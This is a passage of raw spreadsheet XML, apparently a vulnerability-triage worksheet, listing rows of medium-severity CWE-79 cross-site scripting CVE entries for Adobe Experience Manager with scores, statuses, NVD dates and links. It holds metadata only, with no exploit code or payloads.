r="M1371" s="5" t="inlineStr" /><c r="N1371" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1371" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1371" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1371" s="5" t="inlineStr" /><c r="R1371" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75635</t></is></c></row><row r="1372"><c r="A1372" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1372" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1372" s="5" t="inlineStr"><is><t>CVE-2026-75636</t></is></c><c r="D1372" s="5" t="n"><v>5.4</v></c><c r="E1372" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1372" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1372" s="5" t="inlineStr" /><c r="H1372" s="5" t="n"><v>0.002</v></c><c r="I1372" s="5" t="inlineStr" /><c r="J1372" s="5" t="inlineStr" /><c r="K1372" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1372" s="5" t="inlineStr" /><c r="M1372" s="5" t="inlineStr" /><c r="N1372" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1372" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1372" s="5" t="inlineStr" /><c r="R1372" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75636</t></is></c></row><row r="1373"><c r="A1373" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1373" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1373" s="5" t="inlineStr"><is><t>CVE-2026-75637</t></is></c><c r="D1373" s="5" t="n"><v>5.4</v></c><c r="E1373" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1373" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1373" s="5" t="inlineStr" /><c r="H1373" s="5" t="n"><v>0.003</v></c><c r="I1373" s="5" t="inlineStr" /><c r="J1373" s="5" t="inlineStr" /><c r="K1373" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1373" s="5" t="inlineStr" /><c r="M1373" s="5" t="inlineStr" /><c r="N1373" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1373" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1373" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1373" s="5" t="inlineStr" /><c r="R1373" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75637</t></is></c></row><row r="1374"><c r="A1374" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1374" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1374" s="5" t="inlineStr"><is><t>CVE-2026-75639</t></is></c><c r="D1374" s="5" t="n"><v>5.4</v></c><c r="E1374" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1374" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1374" s="5" t="inlineStr" /><c r="H1374" s="5" t="n"><v>0.002</v></c><c r="I1374" s="5" t="inlineStr" /><c r="J1374" s="5" t="inlineStr" /><c r="K1374" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1374" s="5" t="inlineStr" /><c r="M1374" s="5" t="inlineStr" /><c r="N1374" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1374" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1374" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1374" s="5" t="inlineStr" /><c r="R1374" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75639</t></is></c></row><row r="1375"><c r="A1375" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1375" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1375" s="5" t="inlineStr"><is><t>CVE-2026-75640</t></is></c><c r="D1375" s="5" t="n"><v>5.4</v></c><c r="E1375" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1375" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1375" s="5" t="inlineStr" /><c r="H1375" s="5" t="n"><v>0.002</v></c><c r="I1375" s="5" t="inlineStr" /><c r="J1375" s="5" t="inlineStr" /><c r="K1375" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1375" s="5" t="inlineStr" /><c r="M1375" s="5" t="inlineStr" /><c r="N1375" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1375" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1375" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1375" s="5" t="inlineStr" /><c r="R1375" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75640</t></is></c></row><row r="1376"><c r="A1376" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1376" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1376" s="5" t="inlineStr"><is><t>CVE-2026-75642</t></is></c><c r="D1376" s="5" t="n"><v>5.4</v></c><c r="E1376" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1376" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1376" s="5" t="inlineStr" /><c r="H1376" s="5" t="n"><v>0.002</v></c><c r="I1376" s="5" t="inlineStr" /><c r="J1376" s="5" t="inlineStr" /><c r="K1376" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1376" s="5" t="inlineStr" /><c r="M1376" s="5" t="inlineStr" /><c r="N1376" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1376" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1376" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1376" s="5" t="inlineStr" /><c r="R1376" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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76" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75642</t></is></c></row><row r="1377"><c r="A1377" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1377" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1377" s="5" t="inlineStr"><is><t>CVE-2026-75643</t></is></c><c r="D1377" s="5" t="n"><v>5.4</v></c><c r="E1377" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1377" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1377" s="5" t="inlineStr" /><c r="H1377" s="5" t="n"><v>0.002</v></c><c r="I1377" s="5" t="inlineStr" /><c r="J1377" s="5" t="inlineStr" /><c r="K1377" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1377" s="5" t="inlineStr" /><c r="M1377" s="5" t="inlineStr" /><c r="N1377" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1377" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1377" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1377" s="5" t="inlineStr" /><c r="R1377" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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77" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75643</t></is></c></row><row r="1378"><c r="A1378" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1378" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1378" s="5" t="inlineStr"><is><t>CVE-2026-75644</t></is></c><c r="D1378" s="5" t="n"><v>5.4</v></c><c r="E1378" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1378" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1378" s="5" t="inlineStr" /><c r="H1378" s="5" t="n"><v>0.002</v></c><c r="I1378" s="5" t="inlineStr" /><c r="J1378" s="5" t="inlineStr" /><c r="K1378" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1378" s="5" t="inlineStr" /><c r="M1378" s="5" t="inlineStr" /><c r="N1378" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1378" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1378" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1378" s="5" t="inlineStr" /><c r="R1378" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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78" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75644</t></is></c></row><row r="1379"><c r="A1379" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1379" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1379" s="5" t="inlineStr"><is><t>CVE-2026-75646</t></is></c><c r="D1379" s="5" t="n"><v>5.4</v></c><c r="E1379" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1379" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1379" s="5" t="inlineStr" /><c r="H1379" s="5" t="n"><v>0.002</v></c><c r="I1379" s="5" t="inlineStr" /><c r="J1379" s="5" t="inlineStr" /><c r="K1379" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1379" s="5" t="inlineStr" /><c r="M1379" s="5" t="inlineStr" /><c r="N1379" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1379" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1379" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1379" s="5" t="inlineStr" /><c r="R1379" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75646</t></is></c></row><row r="1380"><c r="A1380" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1380" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1380" s="5" t="inlineStr"><is><t>CVE-2026-75647</t></is></c><c r="D1380" s="5" t="n"><v>5.4</v></c><c r="E1380" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1380" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1380" s="5" t="inlineStr" /><c r="H1380" s="5" t="n"><v>0.002</v></c><c r="I1380" s="5" t="inlineStr" /><c r="J1380" s="5" t="inlineStr" /><c r="K1380" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1380" s="5" t="inlineStr" /><c r="M1380" s="5" t="inlineStr" /><c r="N1380" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1380" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1380" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1380" s="5" t="inlineStr" /><c r="R1380" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75647</t></is></c></row><row r="1381"><c r="A1381" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1381" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1381" s="5" t="inlineStr"><is><t>CVE-2026-75651</t></is></c><c r="D1381" s="5" t="n"><v>5.4</v></c><c r="E1381" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1381" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1381" s="5" t="inlineStr" /><c r="H1381" s="5" t="n"><v>0.002</v></c><c r="I1381" s="5" t="inlineStr" /><c r="J1381" s="5" t="inlineStr" /><c r="K1381" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1381" s="5" t="inlineStr" /><c r="M1381" s="5" t="inlineStr" /><c r="N1381" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1381" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1381" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1381" s="5" t="inlineStr" /><c r="R1381" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75651</t></is></c></row><row r="1382"><c r="A1382" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1382" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1382" s="5" t="inlineStr"><is><t>CVE-2026-75652</t></is></c><c r="D1382" s="5" t="n"><v>5.4</v></c><c r="E1382" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1382" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1382" s="5" t="inlineStr" /><c r="H1382" s="5" t="n"><v>0.002</v></c><c r="I1382" s="5" t="inlineStr" /><c r="J1382" s="5" t="inlineStr" /><c r="K1382" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1382" s="5" t="inlineStr" /><c r="M1382" s="5" t="inlineStr" /><c r="N1382" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1382" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1382" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1382" s="5" t="inlineStr" /><c r="R1382" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75652</t></is></c></row><row r="1383"><c r="A1383" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1383" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1383" s="5" t="inlineStr"><is><t>CVE-2026-75657</t></is></c><c r="D1383" s="5" t="n"><v>5.4</v></c><c r="E1383" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1383" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1383" s="5" t="inlineStr" /><c r="H1383" s="5" t="n"><v>0.002</v></c><c r="I1383" s="5" t="inlineStr" /><c r="J1383" s="5" t="inlineStr" /><c r="K1383" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1383" s="5" t="inlineStr" /><c r="M1383" s="5" t="inlineStr" /><c r="N1383" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1383" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1383" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1383" s="5" t="inlineStr" /><c r="R1383" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75657</t></is></c></row><row r="1384"><c r="A1384" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1384" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1384" s="5" t="inlineStr"><is><t>CVE-2026-75659</t></is></c><c r="D1384" s="5" t="n"><v>5.4</v></c><c r="E1384" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1384" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1384" s="5" t="inlineStr" /><c r="H1384" s="5" t="n"><v>0.002</v></c><c r="I1384" s="5" t="inlineStr" /><c r="J1384" s="5" t="inlineStr" /><c r="K1384" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1384" s="5" t="inlineStr" /><c r="M1384" s="5" t="inlineStr" /><c r="N1384" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1384" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1384" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1384" s="5" t="inlineStr" /><c r="R1384" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75659</t></is></c></row><row r="1385"><c r="A1385" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1385" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1385" s="5" t="inlineStr"><is><t>CVE-2026-75660</t></is></c><c r="D1385" s="5" t="n"><v>5.4</v></c><c r="E1385" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1385" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1385" s="5" t="inlineStr" /><c r="H1385" s="5" t="n"><v>0.002</v></c><c r="I1385" s="5" t="inlineStr" /><c r="J1385" s="5" t="inlineStr" /><c r="K1385" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1385" s="5" t="inlineStr" /><c r="M1385" s="5" t="inlineStr" /><c r="N1385" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1385" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1385" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1385" s="5" t="inlineStr" /><c r="R1385" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75660</t></is></c></row><row r="1386"><c r="A1386" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1386" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1386" s="5" t="inlineStr"><is><t>CVE-2026-75661</t></is></c><c r="D1386" s="5" t="n"><v>5.4</v></c><c r="E1386" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1386" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1386" s="5" t="inlineStr" /><c r="H1386" s="5" t="n"><v>0.003</v></c><c r="I1386" s="5" t="inlineStr" /><c r="J1386" s="5" t="inlineStr" /><c r="K1386" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1386" s="5" t="inlineStr" /><c r="M1386" s="5" t="inlineStr" /><c r="N1386" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1386" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1386" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1386" s="5" t="inlineStr" /><c r="R1386" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75661</t></is></c></row><row r="1387"><c r="A1387" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1387" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1387" s="5" t="inlineStr"><is><t>CVE-2026-75666</t></is></c><c r="D1387" s="5" t="n"><v>5.4</v></c><c r="E1387" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1387" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1387" s="5" t="inlineStr" /><c r="H1387" s="5" t="n"><v>0.003</v></c><c r="I1387" s="5" t="inlineStr" /><c r="J1387" s="5" t="inlineStr" /><c r="K1387" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1387" s="5" t="inlineStr" /><c r="M1387" s="5" t="inlineStr" /><c r="N1387" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1387" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1387" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1387" s="5" t="inlineStr" /><c r="R1387" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75666</t></is></c></row><row r="1388"><c r="A1388" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1388" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1388" s="5" t="inlineStr"><is><t>CVE-2026-75667</t></is></c><c r="D1388" s="5" t="n"><v>5.4</v></c><c r="E1388" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1388" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1388" s="5" t="inlineStr" /><c r="H1388" s="5" t="n"><v>0.003</v></c><c r="I1388" s="5" t="inlineStr" /><c r="J1388" s="5" t="inlineStr" /><c r="K1388" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1388" s="5" t="inlineStr" /><c r="M1388" s="5" t="inlineStr" /><c r="N1388" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1388" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1388" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1388" s="5" t="inlineStr" /><c r="R1388" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75667</t></is></c></row><row r="1389"><c r="A1389" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1389" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1389" s="5" t="inlineStr"><is><t>CVE-2026-75668</t></is></c><c r="D1389" s="5" t="n"><v>5.4</v></c><c r="E1389" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1389" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1389" s="5" t="inlineStr" /><c r="H1389" s="5" t="n"><v>0.003</v></c><c r="I1389" s="5" t="inlineStr" /><c r="J1389" s="5" t="inlineStr" /><c r="K1389" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1389" s="5" t="inlineStr" /><c r="M1389" s="5" t="inlineStr" /><c r="N1389" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1389" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1389" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1389" s="5" t="inlineStr" /><c r="R1389" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75668</t></is></c></row><row r="1390"><c r="A1390" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1390" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1390" s="5" t="inlineStr"><is><t>CVE-2026-75669</t></is></c><c r="D1390" s="5" t="n"><v>5.4</v></c><c r="E1390" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1390" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1390" s="5" t="inlineStr" /><c r="H1390" s="5" t="n"><v>0.003</v></c><c r="I1390" s="5" t="inlineStr" /><c r="J1390" s="5" t="inlineStr" /><c r="K1390" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1390" s="5" t="inlineStr" /><c r="M1390" s="5" t="inlineStr" /><c r="N1390" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1390" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1390" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1390" s="5" t="inlineStr" /><c r="R1390" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75669</t></is></c></row><row r="1391"><c r="A1391" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1391" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1391" s="5" t="inlineStr"><is><t>CVE-2026-75670</t></is></c><c r="D1391" s="5" t="n"><v>5.4</v></c><c r="E1391" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1391" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1391" s="5" t="inlineStr" /><c r="H1391" s="5" t="n"><v>0.003</v></c><c r="I1391" s="5" t="inlineStr" /><c r="J1391" s="5" t="inlineStr" /><c r="K1391" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1391" s="5" t="inlineStr" /><c r="M1391" s="5" t="inlineStr" /><c r="N1391" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1391" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1391" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1391" s="5" t="inlineStr" /><c r="R1391" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75670</t></is></c></row><row r="1392"><c r="A1392" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1392" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1392" s="5" t="inlineStr"><is><t>CVE-2026-75671</t></is></c><c r="D1392" s="5" t="n"><v>5.4</v></c><c r="E1392" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1392" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1392" s="5" t="inlineStr" /><c r="H1392" s="5" t="n"><v>0.003</v></c><c r="I1392" s="5" t="inlineStr" /><c r="J1392" s="5" t="inlineStr" /><c r="K1392" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1392" s="5" t="inlineStr" /><c r="M1392" s="5" t="inlineStr" /><c r="N1392" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1392" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1392" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1392" s="5" t="inlineStr" /><c r="R1392" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75671</t></is></c></row><row r="1393"><c r="A1393" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1393" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1393" s="5" t="inlineStr"><is><t>CVE-2026-75672</t></is></c><c r="D1393" s="5" t="n"><v>5.4</v></c><c r="E1393" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1393" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1393" s="5" t="inlineStr" /><c r="H1393" s="5" t="n"><v>0.003</v></c><c r="I1393" s="5" t="inlineStr" /><c r="J1393" s="5" t="inlineStr" /><c r="K1393" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1393" s="5" t="inlineStr" /><c r="M1393" s="5" t="inlineStr" /><c r="N1393" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1393" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1393" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1393" s="5" t="inlineStr" /><c r="R1393" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75672</t></is></c></row><row r="1394"><c r="A1394" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1394" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1394" s="5" t="inlineStr"><is><t>CVE-2026-75674</t></is></c><c r="D1394" s="5" t="n"><v>5.4</v></c><c r="E1394" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1394" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1394" s="5" t="inlineStr" /><c r="H1394" s="5" t="n"><v>0.003</v></c><c r="I1394" s="5" t="inlineStr" /><c r="J1394" s="5" t="inlineStr" /><c r="K1394" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1394" s="5" t="inlineStr" /><c r="M1394" s="5" t="inlineStr" /><c r="N1394" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1394" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1394" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1394" s="5" t="inlineStr" /><c r="R1394" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75674</t></is></c></row><row r="1395"><c r="A1395" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1395" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1395" s="5" t="inlineStr"><is><t>CVE-2026-75675</t></is></c><c r="D1395" s="5" t="n"><v>5.4</v></c><c r="E1395" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1395" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1395" s="5" t="inlineStr" /><c r="H1395" s="5" t="n"><v>0.003</v></c><c r="I1395" s="5" t="inlineStr" /><c r="J1395" s="5" t="inlineStr" /><c r="K1395" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1395" s="5" t="inlineStr" /><c r="M1395" s="5" t="inlineStr" /><c r="N1395" s="5" 